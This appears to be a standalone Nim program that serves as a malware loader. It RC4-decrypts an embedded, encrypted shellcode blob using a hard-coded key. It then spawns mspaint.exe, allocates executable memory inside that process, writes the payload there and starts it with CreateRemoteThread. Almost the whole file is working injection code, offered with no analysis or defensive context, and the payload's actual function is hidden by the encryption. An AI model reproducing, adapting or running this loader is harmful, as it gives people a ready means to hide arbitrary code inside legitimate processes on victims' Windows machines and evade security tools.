import strutils
import sequtils
import system
import osproc
import winim
proc swap(a: var byte, b: var byte) =
let tmp = a
a = b
b = tmp
proc KSA(s: var seq[byte], key: seq[byte]) =
let keyL = len(key)
var y = 0
# initialize
for k in 0 ..< 256:
s[k] = byte(k)
for x in 0 ..< 256:
y = (y + int(s[x]) + int(key[x mod keyL])) mod 256
swap(s[x], s[y.byte])
proc PRGA(s: var seq[byte], messageL: int): seq[byte] =
var i = 0
var j = 0
result = newSeq[byte](messageL)
for k in 0 ..< messageL:
i = (i + 1) mod 256
j = (j + int(s[i])) mod 256
swap(s[i], s[j.byte])
result[k] = s[(int(s[i]) + int(s[j])) mod 256]
proc RC4(plaintext: seq[byte], key: seq[byte]): seq[byte] =
let messageL = len(plaintext)
var s = newSeq[byte](256)
KSA(s, key)
let keystream = PRGA(s, messageL)
result = newSeq[byte](messageL)
for i in 0 ..< messageL:
result[i] = plaintext[i] xor keystream[i]
when isMainModule:
let plaintext: seq[byte] = @[
byte 0x61, 0x03, 0xDF, 0x4C, 0xE0, 0x8E, 0xFF, 0x5F, 0xB2, 0x7F, 0x28, 0x22, 0xE9,
0x3B, 0x1A, 0x09, 0xB6, 0x66, 0x78, 0xCD, 0xAD, 0x67, 0xE1, 0x18, 0x82, 0x91,
0x83, 0x1C, 0xE9, 0x9D, 0x09, 0x80, 0xFB, 0x0F, 0xD7, 0x3A, 0x06, 0xB2, 0xF2,
0x6B, 0x0C, 0xA4, 0x93, 0x29, 0xBE, 0x3D, 0x73, 0x78, 0xEE, 0xD5, 0x6B, 0xB7,
0xB5, 0x5B, 0x98, 0xF0, 0x8E, 0x61, 0xD3, 0x3F, 0x2B, 0xEB, 0x06, 0xA2, 0x9B,
0xE5, 0xDA, 0xED, 0x0C, 0xF1, 0xF4, 0x64, 0x82, 0x8B, 0x96, 0xD0, 0x71, 0x9A,
0xCB, 0x59, 0x41, 0x7C, 0x52, 0x06, 0x4D, 0xC7, 0x00, 0xEC, 0x80, 0xDD, 0xDF,
0x37, 0x4D, 0x3C, 0x25, 0x82, 0xB4, 0x37, 0xE6, 0x25, 0x75, 0xDC, 0xBE, 0xF0,
0x1E, 0xD1, 0x1A, 0xDE, 0x2D, 0xB8, 0xA2, 0xA1, 0x6B, 0x7D, 0x0F, 0xC0, 0xC0,
0x66, 0x4A, 0x9E, 0x9A, 0x9A, 0x93, 0x6B, 0xA4, 0x63, 0x51, 0xA0, 0x91, 0xB0,
0x99, 0x21, 0xDC, 0xDB, 0x41, 0xF7, 0xCC, 0xB8, 0xD5, 0x4B, 0xFF, 0xA2, 0x58,
0xA8, 0xEF, 0xE3, 0x90, 0x50, 0x3C, 0x03, 0x30, 0x42, 0x3C, 0x1B, 0x5F, 0x9C,
0x8F, 0xF2, 0xC7, 0x19, 0xA5, 0x07, 0x3E, 0x1C, 0x70, 0x6E, 0x80, 0xDA, 0x23,
0x37, 0x51, 0x98, 0x7D, 0xBE, 0x55, 0xF9, 0x56, 0x52, 0x0E, 0x48, 0x40, 0x2D,
0x9A, 0xD3, 0x0F, 0xB8, 0x92, 0x62, 0xE7, 0x5C, 0x0A, 0x2E, 0xFE, 0xF8, 0x96,
0x8E, 0x10, 0x6A, 0x04, 0x0B, 0xDD, 0x24, 0xCB, 0x18, 0x20, 0x9E, 0x23, 0x9A,
0x57, 0xC1, 0x38, 0xC0, 0xD7, 0x0A, 0x57, 0x3E, 0x80, 0x75, 0x9B, 0x79, 0x59,
0xB6, 0x31, 0xE4, 0x3E, 0xBA, 0xBB, 0x1E, 0x91, 0xC5, 0x10, 0xA0, 0x63, 0x6B,
0x99, 0x9F, 0x61, 0x6C, 0xB5, 0x1A, 0x09, 0x61, 0xFD, 0x21, 0xCC, 0x64, 0xC4,
0x9C, 0xCA, 0x15, 0xA1, 0x3B, 0x62, 0x44, 0x5B, 0x34, 0xDC, 0x06, 0xEB, 0x8F,
0xB1, 0x50, 0x7B, 0x1C, 0x77, 0xC7, 0x8B, 0x24, 0x34, 0x5E, 0xC4, 0x02, 0x00,
0x3F, 0x1D, 0x05, 0x2E, 0x18, 0xC5, 0xEA, 0x6D, 0x6F
]
let key: seq[byte] = @[0x6d, 0x65, 0x6f, 0x77, 0x6d, 0x65, 0x6f, 0x77]
let payload = RC4(plaintext, key)
let process = startProcess("mspaint.exe")
echo "started process: ", process.processID
let ph = winim.OpenProcess(
PROCESS_ALL_ACCESS,
false,
cast[DWORD](process.processID)
)
when isMainModule:
let mem = VirtualAllocEx(
ph,
NULL,
cast[SIZE_T](plaintext.len),
MEM_COMMIT,
PAGE_EXECUTE_READ_WRITE
)
var btw: SIZE_T
let wp = WriteProcessMemory(
ph,
mem,
unsafeAddr payload[0],
cast[SIZE_T](plaintext.len),
addr btw
)
echo "writeprocessmemory: ", bool(wp)
let th = CreateRemoteThread(
ph,
NULL,
0,
cast[LPTHREAD_START_ROUTINE](mem),
NULL,
0,
NULL
)
echo "successfully inject to process: ", process.processID
echo "thread Handle: ", th
Login
